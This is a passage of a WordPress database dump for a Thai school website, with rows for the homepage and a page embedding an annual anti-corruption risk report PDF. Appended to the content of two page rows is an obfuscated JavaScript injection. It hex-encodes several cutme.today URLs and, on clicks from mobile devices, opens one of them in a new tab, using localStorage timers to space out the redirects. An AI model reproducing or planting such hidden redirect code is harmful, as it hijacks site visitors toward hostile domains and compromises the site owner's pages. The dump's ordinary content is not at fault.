src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-21 09:29:57','2024-08-21 02:29:57','',14,'http://pakhaeng.ssk.in.th/?p=1019',0,'revision','',0),
(1020,1,'2024-08-21 09:33:13','2024-08-21 02:33:13','<!-- wp:file {\"id\":1025,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี\"></object><a id=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9e','','','2024-08-21 09:45:53','2024-08-21 02:45:53','',0,'http://pakhaeng.ssk.in.th/?page_id=1020',0,'page','',0),
(1021,1,'2024-08-21 09:31:04','2024-08-21 02:31:04','','มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน','','inherit','','closed','','%e0%b8%a1%e0%b8%b2%e0%b8%95%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b9%88%e0%b8%87%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%84%e0%b8%b8%e0%b8%93%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1','','','2024-08-21 09:31:04','2024-08-21 02:31:04','',1020,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน.pdf',0,'attachment','application/pdf',0),
(1022,1,'2024-08-21 09:33:03','2024-08-21 02:33:03','','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9e','','','2024-08-21 09:33:03','2024-08-21 02:33:03','',1020,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf',0,'attachment','application/pdf',0),
(1023,1,'2024-08-21 09:33:13','2024-08-21 02:33:13','<!-- wp:file {\"id\":1022,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี\"></object><a id=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download 